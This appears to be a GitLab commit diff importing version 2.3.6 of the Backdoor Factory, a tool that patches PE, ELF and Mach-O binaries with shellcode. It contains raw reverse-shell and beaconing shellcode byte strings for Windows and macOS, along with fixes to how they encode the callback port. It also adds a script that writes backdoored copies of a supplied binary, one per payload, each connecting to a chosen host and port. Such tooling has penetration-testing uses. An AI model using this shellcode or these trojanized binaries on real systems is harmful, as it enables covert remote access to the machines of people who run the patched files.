Commit cbd41fae authored by Mati's avatar Mati

Imported Upstream version 2.3.6

parent 996cc461
......@@ -268,6 +268,20 @@ Sample Usage:
###Changelog
####12/27/2014
Added payloadtests.py
This script will output patched files in backdoored that will allow for the user to
test the payloads as they wish. Each payload type increments the port used
by one.
```
Usage: payloadtest.py binary HOST PORT
```
####12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.3
2.3.5
"""
author = """\
......
......@@ -243,6 +243,8 @@ class elfbin():
This function sets the shellcode.
"""
avail_shells = []
self.bintype = False
if self.e_machine == 0x03: # x86 chipset
if self.EI_CLASS == 0x1:
......@@ -291,7 +293,8 @@ class elfbin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.avail_shells = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout next
git checkout master
./make.sh
......
......@@ -75,7 +75,7 @@ class macho_intel32_shellcode():
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
......@@ -117,7 +117,7 @@ class macho_intel32_shellcode():
self.shellcode2 = "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
......
......@@ -73,7 +73,7 @@ class macho_intel64_shellcode():
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
......@@ -114,7 +114,7 @@ class macho_intel64_shellcode():
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
......
......@@ -442,7 +442,7 @@ class winI32_shellcode():
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
......
......@@ -118,7 +118,7 @@ class winI64_shellcode():
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
......@@ -422,7 +422,7 @@ class winI64_shellcode():
#"\x1f\x90"
#"\x7f\x00\x00\x01"
)
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
......@@ -695,7 +695,7 @@ class winI64_shellcode():
"\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
"\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
"\xb8")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
"\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
"\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
......
......@@ -111,6 +111,9 @@ class machobin():
"This function sets the shellcode."
print "[*] Looking for and setting selected shellcode"
avail_shells = []
self.bintype = False
if MagicNumber == '0xfeedface':
#x86
......@@ -149,6 +152,8 @@ class machobin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.avail_shells = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
......
#!/usr/bin/env python
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
Each payload has it's own port number.
Usage: ./testNarness.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
......@@ -627,6 +627,9 @@ class pebin():
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
if pickACave == {}:
print "[!!!!] No caves available! Use 'j' for cave jumping or"
print "[!!!!] 'i' for ignore."
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
......@@ -907,6 +910,8 @@ class pebin():
"""
print "[*] Looking for and setting selected shellcode"
avail_shells = []
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
......@@ -936,7 +941,8 @@ class pebin():
continue
else:
print " {0}".format(item)
avail_shells.append(item)
self.flItms['avail_shells'] = avail_shells
return False
#else:
# shell_cmd = self.SHELL + "()"
......
......@@ -9,9 +9,10 @@ fi
cd capstone
if [[ `git pull` != "Already up-to-date." ]]; then
git checkout next
git checkout master
./make.sh
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment